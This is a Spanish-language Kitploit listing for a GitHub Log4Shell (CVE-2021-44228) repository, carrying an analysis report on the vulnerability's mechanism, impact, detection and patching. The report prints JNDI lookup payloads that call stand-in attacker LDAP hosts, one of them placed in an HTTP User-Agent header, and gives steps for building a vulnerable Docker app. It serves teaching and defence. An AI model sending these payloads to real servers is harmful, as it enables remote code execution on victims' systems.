Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Log4shell — CVE-2021-44228 | Kitploit
Herramientas/GitHubGitHub/tpdlshdmlrkfmcla/log4shell
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónPapers e InvestigaciónAprendizaje y Educación
GitHubtpdlshdmlrkfmcla/log4shell

Log4shell

CVE-2021-44228

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Informe de análisis Log4Shell de Igloo Corporation, Won Chi-hyun

Log4shell

CVE-2021-44228 Log4j es un registro gratuito y de código abierto de la Apache Software Foundation, basado en Java y aplicable a todas las aplicaciones. Registra los logs de diversos servicios basados en Java y proporciona una función para descubrir y consultar datos y objetos JNDI, así como para utilizar los recursos encontrados a través de JNDI Lookup de Java (LDAP 1389).

Descarga del archivo de imagen Docker para ejecutar el servidor vulnerable Asudo git clone sudo docker build . -t vulnerable-app Crea la imagen Docker en el directorio actual con la nueva imagen como vulnerable-app.

github.com/welk

Detener el servidor vulnerable no utilizado docker ps -a: verifica todas las imágenes Docker en ejecución docker container: verifica el ID del contenedor

Informe de análisis de Log4Shell (CVE-2021-44228)

1. Resumen

Log4Shell (CVE-2021-44228) es una vulnerabilidad de ejecución remota de código (RCE, Remote Code Execution) descubierta en la librería Apache Log4j.
Los atacantes pueden ejecutar código arbitrario mediante payloads maliciosos, lo que puede causar daños generalizados.

Este informe analiza el principio, el impacto, los casos de explotación y los métodos de detección y respuesta de Log4Shell.


2. Resumen de la vulnerabilidad

ElementoDescripción
Nombre de la vulnerabilidadLog4Shell
Número de CVECVE-2021-44228
Tipo de vulnerabilidadEjecución remota de código (RCE)
Versiones afectadasLog4j 2.0-beta9 ~ 2.14.1
Versión parcheadaLog4j 2.15.0 o superior
Dificultad de ataqueBaja (se puede explotar con solo introducir una cadena simple)
Gravedad🔥 Crítica (CVSS 10.0)

3. Principio de la vulnerabilidad

Log4Shell permite a un atacante ejecutar código malicioso en un servidor remoto aprovechando una vulnerabilidad en la función de búsqueda JNDI (Java Naming and Directory Interface).

3.1 Flujo del ataque

  1. El atacante envía a la aplicación un mensaje de registro que contiene una cadena maliciosa.
  2. Log4j ejecuta una búsqueda JNDI (JNDI Lookup) al registrar el log.
  3. JNDI consulta datos en servidores remotos como LDAP, RMI, etc.
  4. Se carga y ejecuta una clase Java maliciosa desde el servidor del atacante.
  5. Se produce la ejecución remota de código (RCE).

3.2 Ejemplo de código de ataque

El atacante puede explotar la vulnerabilidad con solo dejar la siguiente cadena en el registro:

root@kitploit:~
${jndi:ldap://attacker.com:1389/exploit}
  1. Alcance del impacto La vulnerabilidad Log4Shell afectó a numerosas empresas y servicios que utilizan Log4j.

4.1 Principales servicios y sistemas vulnerables

  • Servicios en la nube: AWS, Google Cloud, Microsoft Azure
  • Aplicaciones empresariales: Apache Struts, ElasticSearch, VMware vCenter
  • Servidores de juegos: Minecraft, Steam
  • Diversas aplicaciones y servidores web: Spring Boot, Tomcat, etc.
  1. Casos de explotación y ejemplos de ataque 5.1 Ataque al servidor de Minecraft El atacante podía hacerse con el control del servidor introduciendo la siguiente cadena en la ventana de chat de Minecraft: shell Copiar Editar ${jndi:ldap://attacker.com:1389/exploit} Cuando el servidor lo registra en el log, se ejecuta código malicioso desde el servidor del atacante a través de JNDI Lookup.

5.2 Ataque a aplicaciones web Se inserta un payload malicioso en campos que se registran en el log de las solicitudes HTTP, como User-Agent, Referer, X-Forwarded-For, etc. Ejemplo: css Copiar Editar GET / HTTP/1.1 Host: victim.com User-Agent: ${jndi:ldap://malicious.com:1389/exploit}

  1. Detección y medidas de respuesta 6.1 Métodos de detección de la vulnerabilidad ✅ Uso de escáneres de seguridad

log4j-scan (https://github.com/fullhunt/log4j-scan) log4shell-detector (https://github.com/Neo23x0/log4shell-detector) ✅ Revisión de archivos de registro Si se detectan patrones como ${jndi:ldap://...} en los registros, se debe responder de inmediato. ✅ Monitoreo de red Verificar si hay solicitudes LDAP o RMI anómalas.

6.2 Medidas de respuesta ✅ Medidas inmediatas

Actualizar a la versión Log4j 2.15.0 o superior. Configurar la variable de entorno al ejecutar Java: shell Copiar Editar -Dlog4j2.formatMsgNoLookups=true Bloquear el patrón jndi:ldap:// en el firewall y en los sistemas IDS/IPS. ✅ Medidas de seguridad a largo plazo

Restringir el uso de JNDI y reforzar las políticas de seguridad. Aplicar un WAF (Web Application Firewall). Realizar revisiones de seguridad periódicas y escaneos de vulnerabilidades.

  1. Parche y solución Versión de Log4j Medidas de respuesta 2.0-beta9 ~ 2.14.1 Vulnerable, requiere actualización 2.15.0 Búsqueda JNDI deshabilitada por defecto 2.16.0 Funcionalidad JNDI completamente eliminada 2.17.0 Medidas adicionales de refuerzo de seguridad ✅ Se recomienda actualizar a la versión más reciente (2.17.1 o superior).

  2. Conclusión Log4Shell (CVE-2021-44228) está considerada una de las vulnerabilidades de seguridad más graves de los últimos años. ✅ Es esencial parchear rápidamente los sistemas vulnerables y realizar un monitoreo continuo de la seguridad. ✅ Se deben realizar revisiones de seguridad en todas las aplicaciones que utilicen Log4j.

  3. Referencias Aviso oficial de seguridad de Apache Log4j NIST National Vulnerability Database (CVE-2021-44228) log4j-scan (GitHub)

Descargar herramienta